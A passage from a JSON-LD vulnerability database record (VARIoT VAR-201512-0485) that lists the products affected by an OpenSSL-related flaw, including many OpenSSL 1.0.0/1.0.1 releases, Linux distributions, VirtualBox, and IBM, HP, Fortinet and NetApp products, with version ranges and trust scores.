"https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0485", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0q" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.04" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.10" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "22" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0s" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "icewall sso", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "10.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0p" }, { "model": "vm virtualbox", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "4.3.35" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "vm virtualbox", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "5.0.0" }, { "model": "vm virtualbox", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "5.0.13" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "vm virtualbox", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "4.3.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.5" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "sun ray software", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.1" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0t" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "5.0.13" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "4.3.35" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.14" }, { "model": "security network controller 1.0.3361m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.19" }, { "model": "(comware r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "59307)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.10" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "oncommand performance manager", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "hsr6602 (comware r3303p28", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66025" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.15" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "fortiauthenticator", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.13" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "qradar incident forensics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "hp870 (comware r2607p51", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "30-165)" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "4500g (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "fortiswitch", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "30-1x5)" }, { "model": "fortiadc", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.2.1" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.5" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smb (comware r1110", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "16205)" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "qradar siem patch ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.44" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "mobile foundation enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "fortimail", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "forticlient", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.3.091" }, { "model": "msr20 (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "msr 50-g2 (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "infosphere master data management patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "ctpview 7.3r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.15" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "si (comware r1517", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51205)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.6" }, { "model": "(comware r7180", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "105007)" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module for", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.38.00" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "security network controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "(comware r7180", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "75007)" }, { "model": "oncommand report", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.12" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.17" }, { "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module for", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "project openssl 1.0.0s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "imc uam tam e0406", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "(comware r5319p15", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "36105)" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.16" }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "msr2000 (comware r0306p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vcx", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.3" }, { "model": "ei (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51205)" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.8.01.00" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "security network controller 1.0.3387m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "project openssl 1.0.1p", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network controller 1.0.3379m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.17" }, { "model": "6125xlg r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "infosphere master data management provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "(comware r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "59007)" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "hsr6800 (comware r7103p09", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "f5000-a (comware f3210p26", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.8" }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.4" }, { "model": "sonas", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.4" }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "imc inode e0407", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.34" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smartcloud entry appliance fixpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.38" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.3" }, { "model": "altavault", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.3" }, { "model": "project openssl 1.0.0t", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.3" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.41" }, { "model": "smb1910 (comware r1113", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "netezza diagnostics tools", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.2" }, { "model": "hi (comware r5501p21", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "55005)" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.4" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "qradar incident forensics patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.53" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "fortirecorder", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.0.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "70" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9xx5)" }, { "model": "hp850 (comware r2607p51", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "imc wsm e0502p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2" }, 